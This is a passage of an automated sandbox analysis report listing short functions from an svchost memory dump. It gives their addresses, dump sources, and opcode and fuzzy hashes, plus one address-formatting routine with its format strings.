                                                                                                                  • Instruction Fuzzy Hash: 6690027120150C02D105B25848446C6000687D0705F96C011A602C699E97658A917131
                                                                                                                  Function 03C72BA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cd06f0b28f58e57bb8cd87df76455e8f5abcd8c715f4d1faada655e17778f8ed
                                                                                                                  • Instruction ID: d9216c63abd1ae65201849efdcb4a50e4151c712ceac89714f174068aaffc200
                                                                                                                  • Opcode Fuzzy Hash: cd06f0b28f58e57bb8cd87df76455e8f5abcd8c715f4d1faada655e17778f8ed
                                                                                                                  • Instruction Fuzzy Hash: 2A90027160550C02D151B25844547C6000687D0705F96C011A002C698D87558B5576A1
                                                                                                                  Function 03C72AD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 12f62d46cdd10e37022eeda355f86b5ee5b258e4315e249936961acc5b6ef2aa
                                                                                                                  • Instruction ID: 5ccc219a2ee1aa6f5f38cdfe196630356f1921bbd00af45df39f71b803a0d9fb
                                                                                                                  • Opcode Fuzzy Hash: 12f62d46cdd10e37022eeda355f86b5ee5b258e4315e249936961acc5b6ef2aa
                                                                                                                  • Instruction Fuzzy Hash: BD900265211504030106F6580744587004787D5755396C021F101D594CD7218A615121
                                                                                                                  Function 03C72AF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 572c9586e11b2366d272f8ea3e460b5446325f63564508eae813589def9106e1
                                                                                                                  • Instruction ID: c2722349e27a935bfc5695f505d3cfbe9a2a88bd3de37575e91234bae57404ec
                                                                                                                  • Opcode Fuzzy Hash: 572c9586e11b2366d272f8ea3e460b5446325f63564508eae813589def9106e1
                                                                                                                  • Instruction Fuzzy Hash: F7900265221504020146F658064458B044697D67553D6C015F141E5D4CC7218A655321
                                                                                                                  Function 03C72AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1cddc42f3248122e8b88e9d435b33fea9dcf695b7cc4d1b94eb57c9fadd963b5
                                                                                                                  • Instruction ID: 2e8e4ebbd39979a97c036f95cf0b1e4137fb25db93f65f02320f814261de36b2
                                                                                                                  • Opcode Fuzzy Hash: 1cddc42f3248122e8b88e9d435b33fea9dcf695b7cc4d1b94eb57c9fadd963b5
                                                                                                                  • Instruction Fuzzy Hash: 069002E1201644924501F3588444B8A450687E0705B96C016E105C5A4CC6258A519135
                                                                                                                  Function 03C739B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 23704cc1692e00a76c61809f41ac85640bf0791c1fea3c9a940ccac78960c245
                                                                                                                  • Instruction ID: 79b255b7f3a25c8e839931f40a2bb101864861b948c2a43a3cf4c2cf473dfe59
                                                                                                                  • Opcode Fuzzy Hash: 23704cc1692e00a76c61809f41ac85640bf0791c1fea3c9a940ccac78960c245
                                                                                                                  • Instruction Fuzzy Hash: 3E90026124555502D151B25C44446964006A7E0705F96C021A081C5D8D86558A556221
                                                                                                                  Function 03C72FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9f1de2568e5b35f41c09ddb7e21c8cb1fe38838aac5b34aaaf48d52decedb78c
                                                                                                                  • Instruction ID: 9bd2d9bce85154b30f317e8e6be32bc5c4c892e2d64f7141fbda9639946fc01f
                                                                                                                  • Opcode Fuzzy Hash: 9f1de2568e5b35f41c09ddb7e21c8cb1fe38838aac5b34aaaf48d52decedb78c
                                                                                                                  • Instruction Fuzzy Hash: 07900261211D0442D201B6684C54B87000687D0707F96C115A015C598CCA158A615521
                                                                                                                  Function 03C72F90 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 96805f36d913fe6a9423e5d6493a79613a97cd180a72f6ee80b7d568ed3d8651
                                                                                                                  • Instruction ID: af061bc7e42375e3cf38ebb6c4b3ce3cf207fe61a584f0b8efc80188a114a787
                                                                                                                  • Opcode Fuzzy Hash: 96805f36d913fe6a9423e5d6493a79613a97cd180a72f6ee80b7d568ed3d8651
                                                                                                                  • Instruction Fuzzy Hash: 9590027120190802D101B258485478B000687D0706F96C011A116C599D87258A516571
                                                                                                                  Function 03C72FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b3bf2a0c596872f11400af4e2ec543d560c9e08edb41399650334c885779a80b
                                                                                                                  • Instruction ID: c5fa407f6bef238fdef9d573b1e13eff083977061a2a10579db8bde873315023
                                                                                                                  • Opcode Fuzzy Hash: b3bf2a0c596872f11400af4e2ec543d560c9e08edb41399650334c885779a80b
                                                                                                                  • Instruction Fuzzy Hash: 7F90027120190802D101B25848487C7000687D0706F96C011A516C599E8765CA916531
                                                                                                                  Function 03C72FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1115037693a0bd49650fcb1ef29b678f2b0df0ed81c991f8ae321e5ca613d024
                                                                                                                  • Instruction ID: 7f7a45951496b504501c0e1f969aa8ad09dde4f8684043a0bf58f3020397ff6d
                                                                                                                  • Opcode Fuzzy Hash: 1115037693a0bd49650fcb1ef29b678f2b0df0ed81c991f8ae321e5ca613d024
                                                                                                                  • Instruction Fuzzy Hash: F3900261601504424141B26888849864006ABE1715796C121A099C594D86598A655665
                                                                                                                  Function 03C72F60 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dd7dbc1b65812bfdc3c8b3aa6d865845b690acf6205fec668580c866f5f05dec
                                                                                                                  • Instruction ID: 1712e05f7f2c8bb087120fe9595f667e5454ca18542cfd3a418b0cfff1cac37e
                                                                                                                  • Opcode Fuzzy Hash: dd7dbc1b65812bfdc3c8b3aa6d865845b690acf6205fec668580c866f5f05dec
                                                                                                                  • Instruction Fuzzy Hash: 749002A121150442D105B2584444786004687E1705F96C012A215C598CC6298E615125
                                                                                                                  Function 03C72F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c5abd74326b62b422f26fe47593f6712fe0fd22ef08f1d0153e6dbd459f667b2
                                                                                                                  • Instruction ID: af5a27673156e8e58387cd342d22957042625c1a32243017c68b61198122fecb
                                                                                                                  • Opcode Fuzzy Hash: c5abd74326b62b422f26fe47593f6712fe0fd22ef08f1d0153e6dbd459f667b2
                                                                                                                  • Instruction Fuzzy Hash: 749002A134150842D101B2584454B860006C7E1705F96C015E106C598D8719CE526126
                                                                                                                  Function 03C72EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 526a57017b305494ce3da651556ccb93360e17fb026eca8b7392d55cf0b5916e
                                                                                                                  • Instruction ID: f4b9876c674b2e959a84995f3a2ae1a5114c1bc452cf8bc1f6534c69a1b9fd6d
                                                                                                                  • Opcode Fuzzy Hash: 526a57017b305494ce3da651556ccb93360e17fb026eca8b7392d55cf0b5916e
                                                                                                                  • Instruction Fuzzy Hash: A29002A120190803D141B6584844687000687D0706F96C011A206C599E8B298E516135
                                                                                                                  Function 03C72E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0a598e5c05893417ac1694d23fd02842b938f5905a806c7946015c0961807497
                                                                                                                  • Instruction ID: be6bcaf4fdf9f6dfb5a73d00c66b5be37e06a639bb86c4b068c61c6544370d8e
                                                                                                                  • Opcode Fuzzy Hash: 0a598e5c05893417ac1694d23fd02842b938f5905a806c7946015c0961807497
                                                                                                                  • Instruction Fuzzy Hash: 8B90026160150902D102B2584444696000B87D0745FD6C022A102C599ECB258B92A131
                                                                                                                  Function 03C72EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 41a8f9461d4ee9289c33852617af2290e19b995a45a779a30c440bfb0ecfbf48
                                                                                                                  • Instruction ID: cd5d0dbdfc45c1236238367d0db5fa4f7885911f113865dcab8e29487817cca4
                                                                                                                  • Opcode Fuzzy Hash: 41a8f9461d4ee9289c33852617af2290e19b995a45a779a30c440bfb0ecfbf48
                                                                                                                  • Instruction Fuzzy Hash: 619002B120150802D141B25844447C6000687D0705F96C011A506C598E87598FD56665
                                                                                                                  Function 03C72E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0baaf74fcfee02f88e31d7af043b879ea998c830b414bc6fdc116123616509db
                                                                                                                  • Instruction ID: 07b89371a4f1f9fa36871b912d0783f1f71d67bc95cf137b20e3a167a4c999c8
                                                                                                                  • Opcode Fuzzy Hash: 0baaf74fcfee02f88e31d7af043b879ea998c830b414bc6fdc116123616509db
                                                                                                                  • Instruction Fuzzy Hash: 6590026130150802D103B2584454686000AC7D1749FD6C012E142C599D87258B53A132
                                                                                                                  Function 03C72DD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b97de109d9ce11f4ca00854bc12cfdcce01ad0cbce555c2f91f9c8a59c9b2676
                                                                                                                  • Instruction ID: b95aec3ceca8c4a18cdb42d24f9c8678a2cccd89f0fdad7f0dd1d748c2d26af6
                                                                                                                  • Opcode Fuzzy Hash: b97de109d9ce11f4ca00854bc12cfdcce01ad0cbce555c2f91f9c8a59c9b2676
                                                                                                                  • Instruction Fuzzy Hash: 1D900261242545525546F2584444587400797E07457D6C012A141C994C86269A56D621
                                                                                                                  Function 03C72DB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 81ae7fb7eec0737ec12ef987033e79c4b7efd00d95891b76133ac50854d34c52
                                                                                                                  • Instruction ID: 7959c87dcfcc67f523e0f252bad21bf2d9a84ff1698d7760c0d2f5c30b70b53c
                                                                                                                  • Opcode Fuzzy Hash: 81ae7fb7eec0737ec12ef987033e79c4b7efd00d95891b76133ac50854d34c52
                                                                                                                  • Instruction Fuzzy Hash: FE90027124150802D142B2584444686000A97D0745FD6C012A042C598E87558B56AA61
                                                                                                                  Function 03C73D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a46ec2a0147464cad4034c9c4d070c433b7f3c139742ee6d0835f494873aba4b
                                                                                                                  • Instruction ID: a4e54c3d3dfa140b725c4146d9cd068026ddfd04dcfd731e025f5f08c97a23e4
                                                                                                                  • Opcode Fuzzy Hash: a46ec2a0147464cad4034c9c4d070c433b7f3c139742ee6d0835f494873aba4b
                                                                                                                  • Instruction Fuzzy Hash: 0690027520150802D511B25858446C6004787D0705F96D411A042C59CD87548AA1A121
                                                                                                                  Function 03C72D00 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b41d002c29a04433801278505445232b55868de5e147a4098f5c61211f679b71
                                                                                                                  • Instruction ID: 62885221928e3cd2a7ab5da937fe13bc1477780380276833fd8c7422276209ae
                                                                                                                  • Opcode Fuzzy Hash: b41d002c29a04433801278505445232b55868de5e147a4098f5c61211f679b71
                                                                                                                  • Instruction Fuzzy Hash: A990026120554842D101B6585448A86000687D0709F96D011A106C5D9DC7358A51A131
                                                                                                                  Function 03C72D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 25339b556130a5f8428e76d34de69378d07463e8d35582d339d360ecb0dc9a3e
                                                                                                                  • Instruction ID: 5460a0524fe1d3517a85ca47f531e7c769fc0a721a2bf25b8d0d28aa80b5cc6c
                                                                                                                  • Opcode Fuzzy Hash: 25339b556130a5f8428e76d34de69378d07463e8d35582d339d360ecb0dc9a3e
                                                                                                                  • Instruction Fuzzy Hash: 3E90026921350402D181B258544868A000687D1706FD6D415A001D59CCCA158A695321
                                                                                                                  Function 03C73D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4f3ceff87f225040f8ba1ace2eb4a329d84bb13f193e5d06741fdcd4274b7285
                                                                                                                  • Instruction ID: 4372523af7e2bdb675277d268a59b9ca5d73cf12e24d31191b69dbacc6e6fe92
                                                                                                                  • Opcode Fuzzy Hash: 4f3ceff87f225040f8ba1ace2eb4a329d84bb13f193e5d06741fdcd4274b7285
                                                                                                                  • Instruction Fuzzy Hash: AF900271202505429541B3585844ACE410687E1706BD6D415A001D598CCA148A615221
                                                                                                                  Function 03C72D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2ec5e3fef85bc7883f36a9a81cfc14227ade316a7002492c8551c14abb453eba
                                                                                                                  • Instruction ID: 0d481d4aae41c2ebb2b2afc0bc20a2567cdc09918271c04b78fd940bbf8aa644
                                                                                                                  • Opcode Fuzzy Hash: 2ec5e3fef85bc7883f36a9a81cfc14227ade316a7002492c8551c14abb453eba
                                                                                                                  • Instruction Fuzzy Hash: 5990026130150403D141B25854586864006D7E1705F96D011E041C598CDA158A565222
                                                                                                                  Function 03C72CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 639d774944fb959c82529cc5b8109e983852a47e9b5d0778f770922c07bb37d4
                                                                                                                  • Instruction ID: cd9ba0f04ae1f3449004b61af729cef47b508c8a8682916607adc07cd4643fa1
                                                                                                                  • Opcode Fuzzy Hash: 639d774944fb959c82529cc5b8109e983852a47e9b5d0778f770922c07bb37d4
                                                                                                                  • Instruction Fuzzy Hash: 8190026160550802D141B2585458786001687D0705F96D011A002C598DC7598B5566A1
                                                                                                                  Function 03C72CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 322bd08880515d1256ad3188221d8dcd285131f1ee51025be506d6dfcc097f55
                                                                                                                  • Instruction ID: 9d4892514085e924343abae3fedf7e74a1a02e932b6321594537480a6ec83b31
                                                                                                                  • Opcode Fuzzy Hash: 322bd08880515d1256ad3188221d8dcd285131f1ee51025be506d6dfcc097f55
                                                                                                                  • Instruction Fuzzy Hash: EA90027120150803D101B2585548787000687D0705F96D411A042C59CDD7568A516121
                                                                                                                  Function 03C72CA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c374ec641fe403108ad000a50be259319a1438c7b2cafa5904bee78014e7d457
                                                                                                                  • Instruction ID: 1c3bcd2550a7eb90aaf10bf9a51a0c36edeeba2c6e0787d547c5b6f210126d10
                                                                                                                  • Opcode Fuzzy Hash: c374ec641fe403108ad000a50be259319a1438c7b2cafa5904bee78014e7d457
                                                                                                                  • Instruction Fuzzy Hash: C790027120150802D101B69854486C6000687E0705F96D011A502C599EC7658A916131
                                                                                                                  Function 03C72C60 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2740e0b13f9f5e04f4fe40e20fc2978b1eeb5632a9198ed2366e80f74479692a
                                                                                                                  • Instruction ID: acc37ffa046e2ec2370b46289f10d2877c31a4f321e0a16c5d262f1a977cdc65
                                                                                                                  • Opcode Fuzzy Hash: 2740e0b13f9f5e04f4fe40e20fc2978b1eeb5632a9198ed2366e80f74479692a
                                                                                                                  • Instruction Fuzzy Hash: 7F90027120150C42D101B2584444BC6000687E0705F96C016A012C698D8715CA517521
                                                                                                                  Function 03C72C70 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7f49764909e6e396c5a00fc965032020b2cfabe2e868c55be8d0337420572be7
                                                                                                                  • Instruction ID: 598963207200d24d0577c0f5483c3fdcfccdafd67aeaeeeddfda3b6d8db47470
                                                                                                                  • Opcode Fuzzy Hash: 7f49764909e6e396c5a00fc965032020b2cfabe2e868c55be8d0337420572be7
                                                                                                                  • Instruction Fuzzy Hash: 5C90027120158C02D111B25884447CA000687D0705F9AC411A442C69CD87958A917121
                                                                                                                  Function 03C72C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                  • Instruction ID: 0d3627805aff96901c21ac4bd397b112becf48653099e955831717f6116fc35e
                                                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                  Function 03C72890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ___swprintf_l
                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                  • Opcode ID: 68f4612d5e19820e097fea57aa846fb415acdf13e87fb68241b6f7b7fc2dd38e
                                                                                                                  • Instruction ID: efe65e552ba8c6ba2f1a327fbf350d34c612125bbbb71844f3318db3e6f654ce
                                                                                                                  • Opcode Fuzzy Hash: 68f4612d5e19820e097fea57aa846fb415acdf13e87fb68241b6f7b7fc2dd38e
                                                                                                                  • Instruction Fuzzy Hash: 3951EBB6A04556BFCB10DF9DC99097EF7B8BB08204B188569E8A5DB641D334DF44CBE0
                                                                                                                  Function 03C67630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
